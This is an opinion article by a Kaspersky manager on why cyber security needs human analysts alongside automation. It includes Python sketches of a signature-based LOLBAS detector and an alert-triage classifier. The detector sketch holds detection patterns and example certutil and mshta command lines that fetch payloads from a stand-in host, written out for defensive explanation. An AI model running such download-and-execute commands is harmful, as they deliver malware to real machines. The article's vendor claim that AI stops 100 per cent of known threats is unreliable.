
Why it’s impossible to completely automate cyber security

Margrith Appleby from Kaspersky outlines the challenges associated with cyber security automation.

Margrith Appleby
Fri, 11 Feb 2022

Businesses face a dilemma. It’s no secret that comprehensive cyber security can be expensive, but the risk of errors with cheaper tools is very high, and insufficient security measures can lead to disastrous consequences, significantly affecting a business’s reputation and bottom line.

Automated incident prevention can look like the solution: it can reduce costs, it removes human error from the equation, and people tend to trust AI more than a human colleague. But in practice, effective cyber protection is only possible when automated solutions are combined with human effort.

Why? First of all, cyber criminals are human beings. Like all of us, they can make decisions based on a mix of cognitive processes and can quickly adapt. Attackers constantly come up with new ways to bypass security systems, invent and implement new sophisticated attack tactics and actively use people’s weaknesses to gain access to a company’s infrastructure.


Even the most sophisticated AI can’t combat the variety of malicious activities out there because it works on the basis of previously acquired and learned experience. Here are some examples of cyber security practices that require human involvement.

Detection of complex threats

These attacks usually consist of a series of separate and legitimate actions that could easily be confused with system administrator or common user activity. Fileless attacks, heavy use of LOLBAS tools, runtime encryption, downloaders and packers are all widely used to help attackers bypass security solutions and controls. Even the most carefully tuned sensors cannot detect previously unknown malicious activities.
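To make the limitation concrete, here is a minimal sketch of how a signature-based sensor works. The patterns below are illustrative examples of known LOLBAS-abuse command lines, not a real detection ruleset; the point is that anything outside the known-pattern list produces no alert at all.

```python
import re

# Toy signature-based sensor: flags command lines matching *known*
# LOLBAS-abuse patterns. These two patterns are illustrative only.
KNOWN_BAD = [
    re.compile(r"certutil(\.exe)?\s+.*-urlcache", re.I),  # certutil file-download abuse
    re.compile(r"rundll32(\.exe)?\s+javascript:", re.I),  # rundll32 inline-script execution
]

def detect(command_line: str) -> bool:
    """Return True only when the command matches a previously known pattern."""
    return any(p.search(command_line) for p in KNOWN_BAD)

# A known technique is caught:
detect("certutil.exe -urlcache -f http://evil.example/a.dll")  # → True
# A technique with no signature sails straight through:
detect("mshta.exe http://evil.example/payload.hta")  # → False
```

The second call illustrates the article’s point: a sensor built from learned experience stays silent on novel tradecraft until a human adds the pattern.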

Artificial intelligence that analyses telemetry from sensors also has limitations. It can’t collect and process all possible data or actions that occur at different times. Even if that were possible, there is another issue – situational awareness. A simple example: AI observes what it believes to be a human-driven APT, but it’s actually a dedicated employee conducting research. This could only be uncovered by contacting the customer. Situational awareness is crucial to differentiate true incidents from false-positive alerts, whether the alert logic is based on a particular attack technique’s behaviour pattern or on anomaly analysis.

This doesn’t mean that AI is ineffective in terms of threat detection. In fact, it can successfully combat 100 per cent of known threats and, when properly configured, can significantly reduce the burden on analysts.

We recently developed a machine learning (ML) analyst for our Managed Detection and Response service. This supervised ML algorithm uses labelled historical data for the primary classification of alerts as false or true positives. All alerts from protected assets are initially processed by this algorithm, and just over a third of the activity is classified as false positives. Anything that exceeds the threshold or matches a specified filtration rule is sent to the security analyst team for examination; the analysts evaluate these alerts using additional methods and data suited to that particular case (and which may not have been available to the AI). When the human analysts solve the problem, they share the result with the ML analyst so the next similar case won’t be a challenge for the AI.
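The shape of that triage loop – classify confidently, escalate the rest, and fold analyst verdicts back into the model – can be sketched as follows. This is a toy stand-in, not Kaspersky’s actual MDR pipeline: the feature names, the naive per-feature scoring and the 0.9 threshold are all invented for illustration.

```python
from collections import Counter, defaultdict

class AlertTriage:
    """Toy supervised triage: auto-close alerts that look confidently like
    false positives, escalate everything else to human analysts, and learn
    from analyst verdicts. Illustrative only."""

    def __init__(self, fp_threshold: float = 0.9):
        self.fp_threshold = fp_threshold
        # feature -> Counter({"fp": n, "tp": n}) from labelled history
        self.feature_counts = defaultdict(Counter)

    def train(self, alerts):
        """alerts: iterable of (feature_set, label) with label 'fp' or 'tp'."""
        for features, label in alerts:
            for f in features:
                self.feature_counts[f][label] += 1

    def fp_probability(self, features) -> float:
        """Average Laplace-smoothed false-positive rate over the alert's features."""
        scores = []
        for f in features:
            c = self.feature_counts[f]
            scores.append((c["fp"] + 1) / (c["fp"] + c["tp"] + 2))
        return sum(scores) / len(scores) if scores else 0.5

    def triage(self, features) -> str:
        """Auto-close only when the model is confident; otherwise escalate."""
        p = self.fp_probability(features)
        return "auto-close" if p >= self.fp_threshold else "escalate"

    def feedback(self, features, verdict: str):
        """Analysts share their verdict so the next similar case is easier."""
        self.train([(features, verdict)])
```

A quick run shows the split the article describes: routine admin activity is filtered out automatically, while anything resembling runtime encryption goes to the human team.

```python
model = AlertTriage()
history = ([({"admin_tool", "office_hours"}, "fp")] * 20
           + [({"runtime_encryption"}, "tp")] * 5)
model.train(history)
model.triage({"admin_tool", "office_hours"})  # → "auto-close"
model.triage({"runtime_encryption"})          # → "escalate"
```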

It’s a joint force approach. This requires special skills, high-grade analyst experience and constant algorithm adjustment. The good news is that it enables security teams to tackle even the most dangerous situations, such as the famous PrintNightmare vulnerability exploitation or MuddyWater APT attack and share those valuable detection scenarios with others.

Proactive manual threat hunting is also required to identify new threats. Security teams can hunt down threats that are lying undiscovered but still active within a company’s infrastructure, identify current cyber criminal and cyber espionage activity in a network, understand the reasons behind these incidents and their likely sources, and plan mitigation activities that help avoid similar attacks.

To sum up, analysts have to constantly adjust and retrain the AI-based algorithm for it to detect new threats and to test the efficiency of the improvements.

Advanced security assessments

Assessments are crucial to gain a detailed perspective of a company’s cyber security readiness. There are automated solutions designed for this, which can help discover publicly known vulnerabilities across a strictly defined set of systems. However, these tools rely on a database of already known security issues and can’t test a security system’s resilience against sophisticated attacks and unconventional adversary behaviour.

For proper protection, more advanced assessment processes should be implemented, such as penetration testing and red teaming, which actually simulate a cyber attack. These are mostly manual, drawing on a specialist’s knowledge and experience and using a mix of tactics, techniques and procedures. Crucially, these services can be adjusted to the company’s specific cyber defence capabilities, imitating the real behaviour of attackers.

Security awareness

Attackers keep an eye on trends and act like good psychologists. You can be sure that each trigger – from the pandemic to Kanye West’s new album – will be used by adversaries to attract a potential victim through phishing emails and malicious websites.

Employees need to have a clear understanding of the importance of cyber security policies as well as the consequences of their actions. An awareness manual or test only used during onboarding is not enough.

The IT security team should keep an eye on the relevance of their security education and invent new, non-standard approaches to deliver crucial information to their colleagues. Alternatively, they can outsource these activities to a professional security awareness training team that shares up-to-date information in an engaging way.

To wrap up, I’m not saying security teams should abandon automation or fight cyber criminals with their “bare hands”, particularly as attackers strive to be as effective as possible and often resort to automated solutions themselves.

The truth lies somewhere in the middle. A smart mix of automated solutions with human creativity, skills and control can ensure a truly comprehensive cyber defence.

Margrith Appleby is the general manager of Kaspersky Australia & New Zealand.
